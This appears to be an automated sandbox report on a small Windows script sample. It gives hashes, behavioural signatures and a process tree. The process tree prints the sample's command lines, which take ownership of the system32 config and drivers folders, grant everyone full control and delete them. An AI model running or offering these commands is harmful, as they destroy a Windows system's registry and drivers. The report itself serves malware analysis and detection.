Analysis
- max time kernel: 119s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 15-08-2024 21:32

Static task: static1
Behavioral task: behavioral1
Sample: file.wsf
Resource: win7-20240704-en
General
- Target: file.wsf
- Size: 2KB
- MD5: a5248e8a553244ebf5fe783d59068860
- SHA1: f866fc5f1d41e8cf209b3ea253f49a9caebb0012
- SHA256: e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
- SHA512: 7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  Processes (PID, process):
    1264  takeown.exe
    2796  takeown.exe
    1912  icacls.exe
    2160  icacls.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes (PID, process):
    1264  takeown.exe
    1912  icacls.exe
    2160  icacls.exe
    2796  takeown.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Opens file in notepad (likely ransom note) (1 IoC)
  Processes (PID, process):
    2816  Notepad.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description, PID, process):
    Token: SeTakeOwnershipPrivilege  1264  takeown.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  Processes (description, PID, process, target process); each row below is recorded three times in the report, 21 entries in total:
    PID 2764 wrote to memory of 2788  2764  cmd.exe      -> WScript.exe
    PID 2788 wrote to memory of 2628  2788  WScript.exe  -> cmd.exe
    PID 2788 wrote to memory of 2680  2788  WScript.exe  -> cmd.exe
    PID 2628 wrote to memory of 2796  2628  cmd.exe      -> takeown.exe
    PID 2680 wrote to memory of 1264  2680  cmd.exe      -> takeown.exe
    PID 2628 wrote to memory of 1912  2628  cmd.exe      -> icacls.exe
    PID 2680 wrote to memory of 2160  2680  cmd.exe      -> icacls.exe
Processes
Process tree (leading number = depth in the tree; image path, then command line, then matched signatures):

1. C:\Windows\system32\cmd.exe (PID 2764)
   cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WScript.exe (PID 2788)
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\cmd.exe (PID 2628)
         "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\takeown.exe (PID 2796)
            takeown /f c:\windows\system32\config\*
            - Possible privilege escalation attempt
            - Modifies file permissions
         4. C:\Windows\system32\icacls.exe (PID 1912)
            icacls c:\windows\system32\config\* /grant everyone:(f)
            - Possible privilege escalation attempt
            - Modifies file permissions
      3. C:\Windows\System32\cmd.exe (PID 2680)
         "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\takeown.exe (PID 1264)
            takeown /f c:\windows\system32\drivers\*
            - Possible privilege escalation attempt
            - Modifies file permissions
            - Suspicious use of AdjustPrivilegeToken
         4. C:\Windows\system32\icacls.exe (PID 2160)
            icacls c:\windows\system32\drivers\* /grant everyone:(f)
            - Possible privilege escalation attempt
            - Modifies file permissions

1. C:\Windows\System32\Notepad.exe (PID 2816)
   "C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnpublishReceive.vbs
   - Opens file in notepad (likely ransom note)

1. C:\Windows\System32\WScript.exe (PID 2976)
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SetPush.vbs"

1. C:\Windows\System32\WScript.exe (PID 2804)
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\UnpublishReceive.vbs"

1. C:\Windows\system32\wbem\WMIADAP.EXE (PID 2604)
   wmiadap.exe /F /T
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: a5248e8a553244ebf5fe783d59068860
  SHA1: f866fc5f1d41e8cf209b3ea253f49a9caebb0012
  SHA256: e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
  SHA512: 7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8
- Filesize: 78B
  MD5: ece02545122cc48c9d8afaf3f94dd04f
  SHA1: 8e07b6da685faad07f8413230a95ce0ae8987e0d
  SHA256: 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
  SHA512: e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5